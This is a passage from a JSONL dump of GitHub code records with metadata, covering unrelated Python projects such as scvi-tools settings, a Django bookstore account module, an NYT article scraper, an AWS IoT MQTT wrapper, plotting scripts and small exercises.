progress_bar_style not in [\"rich\", \"tqdm\"]:\n raise ValueError(\"Progress bar style must be in ['rich', 'tqdm']\")\n self.progress_bar_style = progress_bar_style\n self.logging_dir = logging_dir\n self.dl_num_workers = dl_num_workers\n self._num_threads = None\n self.jax_preallocate_gpu_memory = jax_preallocate_gpu_memory\n self.verbosity = verbosity\n\n @property\n def batch_size(self) -> int:\n \"\"\"Minibatch size for loading data into the model.\n\n This is only used after a model is trained. Trainers have specific\n `batch_size` parameters.\n \"\"\"\n return self._batch_size\n\n @batch_size.setter\n def batch_size(self, batch_size: int):\n \"\"\"Minibatch size for loading data into the model.\n\n This is only used after a model is trained. Trainers have specific\n `batch_size` parameters.\n \"\"\"\n self._batch_size = batch_size\n\n @property\n def dl_num_workers(self) -> int:\n \"\"\"Number of workers for PyTorch data loaders (Default is 0).\"\"\"\n return self._dl_num_workers\n\n @dl_num_workers.setter\n def dl_num_workers(self, dl_num_workers: int):\n \"\"\"Number of workers for PyTorch data loaders (Default is 0).\"\"\"\n self._dl_num_workers = dl_num_workers\n\n @property\n def logging_dir(self) -> Path:\n \"\"\"Directory for training logs (default `'./scvi_log/'`).\"\"\"\n return self._logging_dir\n\n @logging_dir.setter\n def logging_dir(self, logging_dir: Union[str, Path]):\n self._logging_dir = Path(logging_dir).resolve()\n\n @property\n def num_threads(self) -> None:\n \"\"\"Number of threads PyTorch will use.\"\"\"\n return self._num_threads\n\n @num_threads.setter\n def num_threads(self, num: int):\n \"\"\"Number of threads PyTorch will use.\"\"\"\n self._num_threads = num\n torch.set_num_threads(num)\n\n @property\n def progress_bar_style(self) -> str:\n \"\"\"Library to use for progress bar.\"\"\"\n return self._pbar_style\n\n @progress_bar_style.setter\n def progress_bar_style(self, pbar_style: Literal[\"tqdm\", \"rich\"]):\n \"\"\"Library to use for progress bar.\"\"\"\n self._pbar_style = pbar_style\n\n @property\n def seed(self) -> int:\n \"\"\"Random seed for torch and numpy.\"\"\"\n return self._seed\n\n @seed.setter\n def seed(self, seed: Union[int, None] = None):\n \"\"\"Random seed for torch and numpy.\"\"\"\n if seed is None:\n self._seed = None\n else:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n seed_everything(seed)\n self._seed = seed\n\n @property\n def verbosity(self) -> int:\n \"\"\"Verbosity level (default `logging.INFO`).\"\"\"\n return self._verbosity\n\n @verbosity.setter\n def verbosity(self, level: Union[str, int]):\n \"\"\"Sets logging configuration for scvi based on chosen level of verbosity.\n\n If \"scvi\" logger has no StreamHandler, add one.\n Else, set its level to `level`.\n\n Parameters\n ----------\n level\n Sets \"scvi\" logging level to `level`\n force_terminal\n Rich logging option, set to False if piping to file output.\n \"\"\"\n self._verbosity = level\n scvi_logger.setLevel(level)\n if len(scvi_logger.handlers) == 0:\n console = Console(force_terminal=True)\n if console.is_jupyter is True:\n console.is_jupyter = False\n ch = RichHandler(\n level=level, show_path=False, console=console, show_time=False\n )\n formatter = logging.Formatter(\"%(message)s\")\n ch.setFormatter(formatter)\n scvi_logger.addHandler(ch)\n else:\n scvi_logger.setLevel(level)\n\n @property\n def warnings_stacklevel(self) -> int:\n \"\"\"Stacklevel for warnings.\"\"\"\n return self._warnings_stacklevel\n\n @warnings_stacklevel.setter\n def warnings_stacklevel(self, stacklevel: int):\n \"\"\"Stacklevel for warnings.\"\"\"\n self._warnings_stacklevel = stacklevel\n\n def reset_logging_handler(self):\n \"\"\"Resets \"scvi\" log handler to a basic RichHandler().\n\n This is useful if piping outputs to a file.\n \"\"\"\n scvi_logger.removeHandler(scvi_logger.handlers[0])\n ch = RichHandler(level=self._verbosity, show_path=False, show_time=False)\n formatter = logging.Formatter(\"%(message)s\")\n ch.setFormatter(formatter)\n scvi_logger.addHandler(ch)\n\n @property\n def jax_preallocate_gpu_memory(self):\n \"\"\"Jax GPU memory allocation settings.\n\n If False, Jax will ony preallocate GPU memory it needs.\n If float in (0, 1), Jax will preallocate GPU memory to that\n fraction of the GPU memory.\n \"\"\"\n return self._jax_gpu\n\n @jax_preallocate_gpu_memory.setter\n def jax_preallocate_gpu_memory(self, value: Union[float, bool]):\n # see https://jax.readthedocs.io/en/latest/gpu_memory_allocation.html#gpu-memory-allocation\n if value is False:\n os.environ[\"XLA_PYTHON_CLIENT_PREALLOCATE\"] = \"false\"\n elif isinstance(value, float):\n if value >= 1 or value <= 0:\n raise ValueError(\"Need to use a value between 0 and 1\")\n # format is \".XX\"\n os.environ[\"XLA_PYTHON_CLIENT_MEM_FRACTION\"] = str(value)[1:4]\n else:\n raise ValueError(\"value not understood, need bool or float in (0, 1)\")\n self._jax_gpu = value\n\n\nsettings = ScviConfig()\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/_settings.py","file_name":"_settings.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"2487046877","text":"import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxProfile\n\n# SeleniumでFiremobileSimulatorを使ってみるサン���ル\n#\n# refs:\n# [まこちの技術情報覚え書き SeleniumとFireMobileSimulatorの連携](http://wavetalker.blog134.fc2.com/blog-entry-76.html)\n# [seleniumでガラケー環境を構築したい人必見!mac上のseleniumでFireMobileSimulatorを動かす方法はこれだ。 \\- Qiita](http://qiita.com/hayakawatomoaki/items/6be743ba98cd8ad41248)\nclass GoogleTestCase(unittest.TestCase):\n\n def setUp(self):\n profile = FirefoxProfile(self.getProfileData());\n self.browser = webdriver.Firefox(profile)\n self.addCleanup(self.browser.quit)\n\n def getProfileData(self):\n # ファイルから読み込み、1行目にプロファイルのフルパスが書いてある想定\n f = open('.FireMobileSimulatorSettings')\n lines = f.read()\n f.close()\n lineArray = lines.split('\\n')\n for line in lineArray:\n return line\n return\n\n def testPageOpen(self):\n self.browser.get('http://google.com')\n time.sleep(3)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nabeen/selenium-python","sub_path":"for_firefox_driver/firemobile_simulator_test.py","file_name":"firemobile_simulator_test.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28061382413","text":"import bs4\nimport json\nfrom pymongo import MongoClient\nfrom pymongo.errors import DuplicateKeyError, CollectionInvalid\nimport datetime as dt\nimport os\n\n# Define the MongoDB database and table\ndb_cilent = MongoClient()\ndb = db_cilent['nyt']\ntable = db['meta']\n\n# Query the NYT API once\ndef single_query(link, payload):\n response = requests.get(link, params=payload)\n if response.status_code != 200:\n print ('WARNING', response.status_code)\n if (response.status_code == 429):\n print('Uh oh. NYT is saying we have too many requests!')\n return {\"stop\":True}\n return None\n else:\n return response.json()\n\n# Determine if the results are more than 100 pages\ndef more_than_100_pages(total_page):\n if total_page > 100:\n pages_left = min(total_page - 100, 100)\n return 100, pages_left, True\n else:\n return total_page, 0, False\n\n# Looping through the pages give the number of pages\ndef loop_through_pages(total_pages, link, payload, table):\n for i in range(total_pages):\n if i % 50 == 0:\n print (' || Page ', i)\n payload['page'] = str(i)\n content = single_query(link, payload)\n if (content == None):\n continue\n if (\"stop\" in content.keys()):\n return\n meta_lst = content['response']['docs']\n\n for meta in meta_lst:\n try:\n table.insert_one(meta)\n except DuplicateKeyError:\n print ('Duplicate entry error in MongoDB.')\n \n# Scrape the meta data (link to article and put it into Mongo)\ndef scrape_meta(days=1):\n table.delete_many({})\n # The basic parameters for the NYT API\n link = 'http://api.nytimes.com/svc/search/v2/articlesearch.json'\n payload = {'api-key': os.environ['NYT_API_KEY']}\n\n today = dt.datetime(2015, 1, 28)\n for day in range(days):\n payload['end_date'] = str(today).replace('-','')\n half_day = today - dt.timedelta(hours=12)\n payload['begin_date'] = str(half_day).replace('-','')\n print ('Scraping period: %s - %s ' % (str(half_day), str(today)))\n\n today -= dt.timedelta(days=2)\n\n content = single_query(link, payload)\n hits = content['response']['meta']['hits']\n total_pages = hits #(hits / 10) + 1\n print ('HITS', hits)\n\n newest_sort_pages, oldest_sort_pages, grt_100 = more_than_100_pages(total_pages)\n print (newest_sort_pages, oldest_sort_pages, grt_100)\n #if grt_100:\n new_payload = payload.copy()\n old_payload = payload.copy()\n new_payload['sort']= 'newest'\n old_payload['sort'] = 'oldest'\n\n loop_through_pages(newest_sort_pages, link, new_payload, table)\n loop_through_pages(oldest_sort_pages, link, old_payload, table)\n\n# Get all the links, visit the page and scrape the content\ndef get_articles(table):\n print(\"getting articles\")\n links = table.find({},{'web_url': 1})\n\n counter = 0\n for uid_link in links:\n counter += 1\n if counter % 100 == 0:\n print ('Count: ', counter, ' ')\n print (uid)\n uid = uid_link['_id']\n link = uid_link['web_url']\n html = requests.get(link).content\n soup = bs4.BeautifulSoup(html, 'html.parser')\n #soup.pretty_print()\n if (soup):\n article_content = '\\n'.join([i.text for i in soup.select('p.story-body-text')])\n print(article_content)\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('.caption-text')])\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('[itemprop=\"description\"]')])\n if not article_content:\n article_content = '\\n'.join([i.text for i in soup.select('#nytDesignBody')])\n else:\n article_content = ''\n print(article_content)\n\n table.update({'_id': uid}, {'$set': {'raw_html': html}})\n table.update({'_id': uid}, {'$set': {'content_txt': article_content}})\n\nif __name__ == '__main__':\n scrape_meta()\n get_articles(table)\n","repo_name":"josiah-d/data_science","sub_path":"solutions/web-scraping/scraping_solns.py","file_name":"scraping_solns.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74435901032","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom django.contrib import messages\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login, logout\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.urls import reverse\n\nfrom bookstore.models import Book\nfrom .models import MyUser, Address\nfrom .forms import RegistrationForm, UserEditForm, UserAddressForm\nfrom .tokens import account_activation_token\n\n@login_required\ndef wishlist(request):\n books = Book.objects.filter(user_wishlist=request.user)\n return render(request, 'account/dashboard/user_wishlist.html', {'wishlist':books})\n\n\n@login_required\ndef add_to_wishlist(request, id):\n book = get_object_or_404(Book, id=id)\n if book.user_wishlist.filter(id=request.user.id).exists():\n book.user_wishlist.remove(request.user)\n else:\n book.user_wishlist.add(request.user)\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n\ndef account_register(request):\n if request.user.is_authenticated:\n return redirect('account:dashboard')\n\n if request.method == 'POST':\n register_form = RegistrationForm(request.POST)\n if register_form.is_valid():\n user = register_form.save(commit=False)\n user.email = register_form.cleaned_data['email']\n user.set_password(register_form.cleaned_data['password'])\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n subject = 'Активация учетной записи'\n message = render_to_string('account/registration/account_activation_email.html',\n {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user)\n }\n )\n user.email_user(subject=subject, message=message)\n return render(request, 'account/registration/register_email_confirm.html', {'form': register_form})\n else:\n return render(request, 'account/registration/register.html', {'form': register_form})\n else:\n register_form = RegistrationForm()\n return render(request, 'account/registration/register.html', {'form': register_form})\n \n\ndef account_activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = MyUser.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, user.DoesNotExists):\n user = None\n \n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n login(request, user)\n return redirect('account:dashboard')\n else:\n return render(request, 'account/registration/activation_invalid.html')\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'account/dashboard/dashboard.html', {})\n\n@login_required\ndef edit_details(request):\n instance = request.user\n if request.method == 'POST':\n user_form = UserEditForm(request.POST, instance=instance)\n if user_form.is_valid():\n user_form.save()\n else:\n user_form = UserEditForm(instance=instance)\n return render(request, 'account/dashboard/edit_details.html', {'user_form': user_form})\n\n@login_required\ndef delete_user(request):\n user = MyUser.objects.get(username=request.user)\n user.is_active = False\n user.save()\n logout(request)\n return redirect('account:delete_confirmation')\n\n\n@login_required\ndef view_address(request):\n addresses = Address.objects.filter(owner=request.user)\n return render(request, 'account/dashboard/addresses.html', {'addresses': addresses})\n\n@login_required\ndef add_address(request):\n if request.method =='POST':\n address_form = UserAddressForm(request.POST)\n if address_form.is_valid():\n address_form = address_form.save(commit=False)\n address_form.owner = request.user\n address_form.save()\n return HttpResponseRedirect(reverse('account:addresses'))\n else:\n return render(request, 'account/dashboard/edit_address.html', {'form':address_form})\n else:\n address_form = UserAddressForm()\n return render(request, 'account/dashboard/edit_address.html', {'form':address_form})\n\n@login_required\ndef edit_address(request, id):\n if request.method == 'POST':\n address = Address.objects.get(pk=id, owner=request.user)\n address_form = UserAddressForm(request.POST, instance=address)\n if address_form.is_valid():\n address_form.save()\n return HttpResponseRedirect(reverse('account:addresses'))\n else:\n address = Address.objects.get(pk=id, owner=request.user)\n address_form = UserAddressForm(instance=address)\n return render(request, 'account/dashboard/edit_address.html', {'form': address_form})\n\n@login_required\ndef delete_address(request, id):\n Address.objects.get(pk=id, owner=request.user).delete()\n return redirect('account:addresses')\n\n@login_required\ndef default_address(request, id):\n if Address.objects.filter(pk=id, owner=request.user, default=True):\n Address.objects.filter(pk=id, owner=request.user, default=True).update(default=False)\n else:\n Address.objects.filter(pk=id, owner=request.user).update(default=True)\n return redirect('account:addresses')","repo_name":"v-makarovskyi/book_store_django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19029777355","text":"import os\nimport json\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n\n\ndef _subscrib(self, params, packet):\n print('Received meessage from AWS IoT Core')\n print('Topic: ' + packet.topic)\n print('payload:', (packet.payload))\n\nclass AwsMqtt():\n\n def __init__(self,endpointurl:str,endpointport:int):\n self.endpointurl = endpointurl\n self.endpointport = endpointport\n self.pem = os.path.join( \"private\", \"AmazonRootCA1.pem\")\n self.key = os.path.join( \"private\", \"private.pem.key\")\n self.crt = os.path.join( \"private\", \"certificate.pem.crt\")\n self.client = AWSIoTMQTTClient(\"JMPV_clientid\")\n self._config()\n self.client.connect()\n\n def _config(self):\n self.client.configureEndpoint(self.endpointurl, self.endpointport)\n # Set path for Root CA and unique device credentials (use the private key and certificate retrieved from the logs in Step 1)\n self.client.configureCredentials(self.pem, self.key, self.crt)\n self.client.configureOfflinePublishQueueing(-1)\n self.client.configureDrainingFrequency(2)\n self.client.configureConnectDisconnectTimeout(10)\n self.client.configureMQTTOperationTimeout(5)\n\n\n\n def subscribe(self,topic:str):\n self.client.subscribe(topic,1,_subscrib)\n\n def publish(self,topic:str,payload:dict):\n self.client.publish(topic,json.dumps(payload),1)\n","repo_name":"miltonmce/Mau_sockets","sub_path":"src/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16405900427","text":"# Python, using Anaconda environment\n# Week 2, Day 7\nimport datetime as dt\nimport time\nimport math\n\ndef sum_till(x: int):\n \"\"\"\n Calculate the sum of 0 to X\n as Exercise 1 oldies\n :param x: (int) the number at the end\n :return: the sum of 0 to x\n \"\"\"\n start_time = dt.datetime.now()\n mySum = 0\n for ix in range(0, x+1):\n mySum += ix\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds() , \" seconds \")\n\n return mySum\n\n\ndef area_of_square(edge_length):\n \"\"\"\n Calculate the area of the square, given the edge length\n as Exercise 2 oldies\n :param edge_length: (float/int) the edge length of the square\n :return: the area of the square\n \"\"\"\n return edge_length**2\n\n\ndef quadrat_label(txtstr: str, number):\n \"\"\"\n Calculate the square of a number\n as Exercise 1\n :param txtstr: (str) input text as a key\n :param number: (int/float) a number\n :return:\n \"\"\"\n print(f\"The input text is {txtstr}\")\n out_number = number**2\n out_pair = {txtstr: out_number}\n\n return out_number, out_pair\n\n\ndef factorial_of(n: int):\n \"\"\"\n Calculates n! (n factorial)\n as Exercise 2\n :param n: (int) number as input for the factorial function\n :return: n factorial\n \"\"\"\n start_time = dt.datetime.now()\n out_factorial = 1\n if n > 0:\n for ix in range(1, n+1):\n out_factorial *= ix\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return out_factorial\n\n\ndef odd_or_even(*mylists):\n start_time = dt.datetime.now()\n # print(mylists)\n odd_list = []\n even_list = []\n for mylist in mylists:\n for ix in mylist:\n # print(ix, type(ix))\n if ix % 2 == 0:\n even_list.append(ix) # even numbers\n else:\n odd_list.append(ix) # odd numbers\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return even_list, odd_list\n\n\ndef character_count(strText: str):\n \"\"\"\n calculate capitals, small letters, and whitespaces in a string,\n as Exercise 6\n :param strText: (str) text as input\n :return: (dict) the result of counting\n \"\"\"\n start_time = dt.datetime.now()\n out_dict = {}\n num_of_capital = len([x for x in strText if x.isupper()])\n num_of_small_letter = len([x for x in strText if x.islower()])\n num_of_space = strText.count(\" \")\n\n out_dict[\"capital\"] = num_of_capital\n out_dict[\"small letter\"] = num_of_small_letter\n out_dict[\"whitespace\"] = num_of_space\n\n time_duration = dt.datetime.now() - start_time\n print(\"run time: \", time_duration.total_seconds(), \" seconds \")\n\n return out_dict\n\n\n# read this: https://realpython.com/python-kwargs-and-args/\n\n\ndef cone_volume(radius: float = 1.0, height: float = 1.0):\n return math.pi * radius**2 * height / 3.0\n\n\ndef sphere_volume(radius: float = 1.0):\n return math.pi * radius**3 * 4.0 / 3.0\n\n\ndef cuboid_volume(length: float = 1.0, width: float = 1.0, height: float = 1.0):\n return length * width * height\n\n\ndef cylinder_volume(radius: float = 1.0, height: float = 1.0):\n return math.pi * radius**2 * height\n\n\ndef shape_volume(fkt, *args):\n volume = fkt(*args)\n return volume\n\n\n\n","repo_name":"iscab/belajar_python","sub_path":"Course2023_alfatraining_Python_Programmierung/Woche_2/helper_func/day7func.py","file_name":"day7func.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25651298614","text":"#! /usr/bin/env python\nfrom _threading_local import local\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages as pdfpages\n\nprint(\"Using pandas {}\".format(pd.__version__))\n\ndf = pd.read_csv('output.csv')\ndf_my = pd.read_csv('output_mybenchmark.csv')\ndef plot(args):\n\n #df = df.set_index(['symbols', 'testcase', 'type'])\n # df_average = df.groupby(['expansion', 'symbols', 'type'])['throughput'].mean()\n\n for type in args:\n expansion_df = df[df['type'] == type]\n symbols=df['symbols']\n y_scale = [1, 5, 10, 20, 50, 100, 200, 300, 1000, 2000]\n if len(expansion_df) == 0:\n print(\"Skipping full no results\")\n\n throughput = df.groupby(['expansion', 'symbols', 'testcase'])['throughput'].mean()\n throughput_my = df.groupby(['expansion', 'symbols', 'testcase'])['throughput'].mean()\n error = df.groupby(['expansion', 'symbols', 'testcase'])['throughput'].apply(np.std)\n # throughput = throughput.set_index(['expansion', 'symbols', 'testcase'])\n\n throughput_expansion1 = df[(df['expansion']==1) & (df['type'] == type)]\n throughput_expansion1 = throughput_expansion1.groupby(['symbols', 'testcase'])['throughput'].mean()\n throughput_expansion1 = throughput_expansion1.unstack(level = 1)\n\n m_throughput_expansion1 = df_my[(df['expansion'] == 1) & (df['type'] == type)]\n m_throughput_expansion1 = m_throughput_expansion1.groupby(['symbols', 'testcase'])['throughput'].mean()\n m_throughput_expansion1 = m_throughput_expansion1.unstack(level=1)\n\n filename = type + \"_fulcrum_kodo_mybenchmark_throughput.pdf\"\n with pdfpages(filename) as pdf:\n plt.figure()\n\n plt.plot(throughput_expansion1['FulcrumInner'], label = 'Inner r=1', color='b')\n plt.plot(throughput_expansion1['FulcrumOuter'], label = 'Outer r=1', color='r')\n plt.plot(throughput_expansion1['FulcrumCombined'], label = 'Combined r=1', color='y')\n\n plt.plot(m_throughput_expansion1['FulcrumInner'], label='My Inner r=1', color='b', linestyle='--')\n plt.plot(m_throughput_expansion1['FulcrumOuter'], label='My Outer r=1', color='r', linestyle='--')\n plt.plot(m_throughput_expansion1['FulcrumCombined'], label='My Combined r=1', color='y', linestyle='--')\n\n plt.ylabel('Throughput [Mbps]')\n plt.xlabel('Generation size')\n plt.yscale('log', linthreshy = 10)\n plt.xscale('log', basex = 2)\n plt.xticks(\n list(scipy.unique(symbols)),\n list(scipy.unique(symbols)))\n plt.yticks(list(scipy.unique(y_scale)),list(scipy.unique(y_scale)))\n plt.title('FULCRUM AND RLNC:' + type.upper())\n #\n # plt.legend(loc='center right', bbox_to_anchor= (1.3, 0.5))\n # plt.yscale('symlog', linthreshy = 10)\n # lgd=plt.legend(loc='center left', prop={\"size\":10}, bbox_to_anchor=(1,0.5))\n plt.legend(loc='best', prop={\"size\": 10})\n plt.grid(True)\n pdf.savefig(dpi =300)\n plt.close()\n # filename = type + \"_throughput.pdf\"\n # with pdfpages(filename) as pdf:\n # for expansion in throughput.index.levels[0]:\n # y = throughput[expansion].unstack('testcase')\n # yerr = error[expansion].unstack('testcase')\n # title = \"expansion={}\".format(expansion)\n # plt.figure()\n #\n # #y.plot(title=title, grid = True)\n # plt.plot(y['FulcrumInner'], linewidth=2)\n # plt.plot(y['FulcrumOuter'], linewidth=2)\n # plt.plot(y['FulcrumCombined'], linewidth=2)\n # # plt.axis([16, 1024, 10, 300]) # plt.axis([xmin, xmax, ymin, ymax])\n # plt.plot(throughput_my['Binary'])\n # plt.plot(throughput_my['Binary8'])\n # plt.ylabel('Throughput [Mbps]')\n # plt.xlabel('Generation size')\n # plt.yscale('log', linthreshy = 10)\n # plt.xscale('log', basex = 2)\n # plt.xticks(\n # list(scipy.unique(symbols)),\n # list(scipy.unique(symbols)))\n # plt.yticks(list(scipy.unique(y_scale)),list(scipy.unique(y_scale)))\n # plt.title(title)\n # plt.legend(loc = 'best', prop={\"size\":10}) #change the size of legend\n # plt.grid(True)\n # # plt.yscale('symlog', linthreshy = 10)\n # pdf.savefig()\n # plt.close()\n\nif __name__ == '__main__':\n args = ['encoder', 'decoder']\n plot(args)","repo_name":"nguyenvutud/kodo-fulcrum","sub_path":"plot_fulcrum_sparse/plot_kodo_mybenchmark.py","file_name":"plot_kodo_mybenchmark.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1695608443","text":"import asyncio\nimport logging\nfrom typing import Optional\n\nimport hummingbot.connector.exchange.coinflex.coinflex_constants as CONSTANTS\nfrom hummingbot.connector.exchange.coinflex.coinflex_api_user_stream_data_source import CoinflexAPIUserStreamDataSource\nfrom hummingbot.connector.exchange.coinflex.coinflex_auth import CoinflexAuth\nfrom hummingbot.core.api_throttler.async_throttler import AsyncThrottler\nfrom hummingbot.core.data_type.user_stream_tracker import UserStreamTracker\nfrom hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource\nfrom hummingbot.core.utils.async_utils import safe_ensure_future, safe_gather\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\nfrom hummingbot.logger import HummingbotLogger\n\n\nclass CoinflexUserStreamTracker(UserStreamTracker):\n _logger: Optional[HummingbotLogger] = None\n\n def __init__(self,\n auth: CoinflexAuth,\n domain: str = CONSTANTS.DEFAULT_DOMAIN,\n throttler: Optional[AsyncThrottler] = None,\n api_factory: Optional[WebAssistantsFactory] = None):\n super().__init__()\n self._auth: CoinflexAuth = auth\n self._ev_loop: asyncio.events.AbstractEventLoop = asyncio.get_event_loop()\n self._data_source: Optional[UserStreamTrackerDataSource] = None\n self._user_stream_tracking_task: Optional[asyncio.Task] = None\n self._domain = domain\n self._throttler = throttler\n self._api_factory = api_factory\n\n @classmethod\n def logger(cls) -> HummingbotLogger:\n if cls._logger is None:\n cls._logger = logging.getLogger(__name__)\n return cls._logger\n\n @property\n def data_source(self) -> UserStreamTrackerDataSource:\n \"\"\"\n Returns the instance of the data source that listens to the private user channel to receive updates from the\n exchange. If the instance is not initialized it will be created.\n :return: the user stream instance that is listening to user updates from the server using the private channel\n \"\"\"\n if not self._data_source:\n self._data_source = CoinflexAPIUserStreamDataSource(\n auth=self._auth,\n domain=self._domain,\n throttler=self._throttler,\n api_factory=self._api_factory\n )\n return self._data_source\n\n async def start(self):\n \"\"\"\n Starts the background task that connects to the exchange and listens to user activity updates\n \"\"\"\n self._user_stream_tracking_task = safe_ensure_future(\n self.data_source.listen_for_user_stream(self._ev_loop, self._user_stream)\n )\n await safe_gather(self._user_stream_tracking_task)\n","repo_name":"waterboi1729/hbot2","sub_path":"hummingbot/connector/exchange/coinflex/coinflex_user_stream_tracker.py","file_name":"coinflex_user_stream_tracker.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21841093848","text":"import os\nimport cv2\nfrom enum import Enum\n\n# define opencv cascade pre-trained models\nclass Cascade_model(Enum):\n class Face(Enum):\n Name = \"face\"\n Model = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n Scale_factor = 1.3\n Min_Neighbors = 5\n class Smile(Enum):\n Name = \"smile\"\n Model = cv2.CascadeClassifier('haarcascade_smile.xml')\n Scale_factor = 1.8\n Min_Neighbors = 20\n\n# get best size based on aspect ratio\ndef get_size_ratio(min_width, min_height, ratio = (4,3)):\n if ratio[0] > ratio[1]:\n if min_width > min_height:\n min_height = min_width * ratio[1] / ratio[0]\n else:\n min_width = min_height * ratio[0] / ratio[1]\n else:\n if min_width > min_height:\n min_height = min_width * ratio[1] / ratio[0]\n else:\n min_width = min_height * ratio[0] / ratio[1]\n return round(min_width), round(min_height)\n\n# crop parts from images and save in another folder\ndef part_croper(input_folder_path, target_folder_path, cascade_model, should_resize = False, height = 128, width = 128):\n images = os.listdir(input_folder_path)\n\n # remove old files\n files_to_remove = os.listdir(target_folder_path)\n if len(files_to_remove) > 0:\n for file in files_to_remove:\n os.remove(os.path.join(target_folder_path,file))\n\n if len(images) > 0:\n for image in images:\n if not \".jpg\" in image.lower():\n continue\n img = cv2.imread(os.path.join(input_folder_path,image))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # detects parts in the input image\n parts = cascade_model.Model.value.detectMultiScale(gray,\n cascade_model.Scale_factor.value,\n cascade_model.Min_Neighbors.value)\n\n # If it doesn't exist, create the target folder\n if not os.path.exists(target_folder_path):\n os.makedirs(target_folder_path)\n\n # save detected parts\n if len(parts) > 0:\n for i, (x, y, w, h) in enumerate(parts):\n\n # get the best width and height for being ready to resize\n if should_resize:\n w, h = get_size_ratio(w,h, (width, height))\n part = img[y:y + h, x:x + w]\n file_name = os.path.join(target_folder_path, f'{image[:-4]}-{cascade_model.Name.value}{i+1}.jpg')\n if os.path.exists(file_name):\n os.remove(file_name)\n\n # resize the photo for consistency\n if should_resize:\n part = cv2.resize(part, (width, height), interpolation=cv2.INTER_LINEAR)\n cv2.imwrite(file_name, part)\n print(file_name)\n else :\n print(image,f\"No {cascade_model.Name.value} detected!\")","repo_name":"mehranr7/smile-detection","sub_path":"Extract_Parts.py","file_name":"Extract_Parts.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27314388243","text":"import sys\r\nsys.path.append('C:/Users/bns36/Documents/calendar_widget/src/calendar_widget')\r\n\r\nimport tkinter\r\nfrom Calendar_Widget import Calendar\r\n\r\n\r\nroot = tkinter.Tk()\r\nroot.geometry('600x600')\r\n\r\ndef Calendar_Click():\r\n\tprint(Calendar.getdate())\r\n\r\nCalendar = Calendar(root,\r\n\tcommand = Calendar_Click,\r\n\t#width=300, # fixed issue 1\r\n\t#height=200, \r\n\t#padding=10 # fixed issue 15\r\n\t)\r\n\r\nCalendar.checkboxes(8, 4, 2023, status=True)\r\n\r\nroot.mainloop()","repo_name":"Spartanlasergun/calendar_widget","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"40438239379","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-09-20 02:07:17\n# @Last Modified time: 2016-10-05 17:32:58\n# @FileName: 198.py\n\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) < 1:\n return 0\n dp = [[] for x in range(len(nums))]\n dp[0] = [0, nums[0]]\n for i in range(1, len(nums)):\n dp[i] = [max(dp[i - 1][0], dp[i - 1][1]), dp[i - 1][0] + nums[i]]\n return max(dp[len(nums) - 1][0], dp[len(nums) - 